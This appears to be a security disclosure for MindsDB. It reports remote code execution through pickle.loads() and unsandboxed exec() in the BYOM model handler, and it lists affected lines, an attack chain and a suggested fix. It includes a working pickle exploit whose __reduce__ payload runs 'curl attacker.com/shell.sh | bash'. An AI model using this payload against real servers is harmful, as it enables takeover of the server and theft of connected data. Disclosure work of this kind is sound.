YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
MindsDB β RCE via pickle.loads() in BYOM (Bring Your Own Model) Handler
Vulnerability Type
CWE-502: Deserialization of Untrusted Data
Severity
Critical β Any user who can create a BYOM model achieves Remote Code Execution on the MindsDB server.
Affected Code
File: mindsdb/integrations/handlers/byom_handler/byom_handler.py
Three functions deserialize user-controlled model state:
# Line 398 β predict()
def predict(self, df, model_state, args):
model_state = pickle.loads(model_state) # β RCE
self.model_instance.__dict__ = model_state
# Line 407 β finetune()
def finetune(self, df, model_state, args):
self.model_instance.__dict__ = pickle.loads(model_state) # β RCE
# Line 419 β describe()
def describe(self, model_state, attribute=None):
model_state = pickle.loads(model_state) # β RCE
self.model_instance.__dict__ = model_state
Also affected:
mindsdb/integrations/handlers/byom_handler/proc_wrapper.py:55:
model_state = pickle.loads(model_state) # subprocess wrapper
mindsdb/interfaces/query_context/context_controller.py:275:
steps_data = pickle.loads(data) # from cache
mindsdb/integrations/libs/process_cache.py:45:
# IPC via pickle β exception propagation
Attack Chain
- Attacker creates a BYOM model via MindsDB SQL:
CREATE MODEL pwned
PREDICT target
USING engine='byom',
code='class Model: pass';
The model's
train()returnspickle.dumps(self.__dict__)β but an attacker who controls the model code can override__dict__to contain a malicious pickle payloadWhen
predict()is called (e.g.,SELECT * FROM pwned WHERE ...), the server deserializes the model state withpickle.loads(model_state)β arbitrary code execution
Alternative: Direct state injection
If the attacker has access to the MindsDB storage backend (database), they can directly replace the model state bytes with a malicious pickle:
import pickle, os
class Exploit:
def __reduce__(self):
return (os.system, ('curl attacker.com/shell.sh | bash',))
malicious_state = pickle.dumps(Exploit())
# Insert into model storage β next predict() = RCE
AI Impact (10x Multiplier)
MindsDB is an AI-in-database platform. The BYOM handler is specifically designed for users to bring custom ML models. Compromising it enables:
- Model poisoning β replace legitimate model with backdoored version
- Training data exfiltration β RCE gives access to all data MindsDB has access to
- Database compromise β MindsDB connects to user databases (MySQL, PostgreSQL, etc.), RCE gives access to all connected data sources
- Supply chain β poisoned model persists across restarts and affects all queries
Known CVE Context
MindsDB has prior deserialization CVEs (CVE-2024-45846, CVE-2024-45847 β eval injection via Weaviate integration). This BYOM pickle.loads is a different, previously unreported vector.
Suggested Fix
Replace pickle.loads with a safe alternative:
import json
import jsonpickle
def predict(self, df, model_state, args):
# Use JSON-based deserialization instead of pickle
model_state = json.loads(model_state)
# Or use restricted unpickler:
# model_state = RestrictedUnpickler(io.BytesIO(model_state)).load()
self.model_instance.__dict__ = model_state
Invariant Violated
S16 (DeserializationGuard): Application MUST NOT use pickle.loads on data from user-controlled or shared storage.
Additional Finding: Direct exec() on User Model Code
File: mindsdb/integrations/handlers/byom_handler/proc_wrapper.py:80
def import_string(code, module_name='model'):
module = types.ModuleType(module_name)
exec(code, module.__dict__) # β Direct code execution, NO sandbox
return module
This is the execution path for BYOM models. When a user creates a model with engine='byom', their Python code is passed to import_string() which calls exec() with no sandboxing, no AST filtering, no import restrictions.
The same file also uses pickle.loads() for IPC (stdin/stdout between parent and worker):
def decode(encoded):
return pickle.loads(encoded) # Line 55
def get_input():
with open(0, 'rb') as fd:
encoded = fd.read()
obj = decode(encoded) # pickle.loads on stdin
Combined Chain
- User creates BYOM model with malicious code β
exec(code)β RCE - Even if exec were sandboxed, the pickle IPC channel is unprotected β pickle.loads bypass
This is a defense-in-depth failure β two independent RCE vectors in the same module.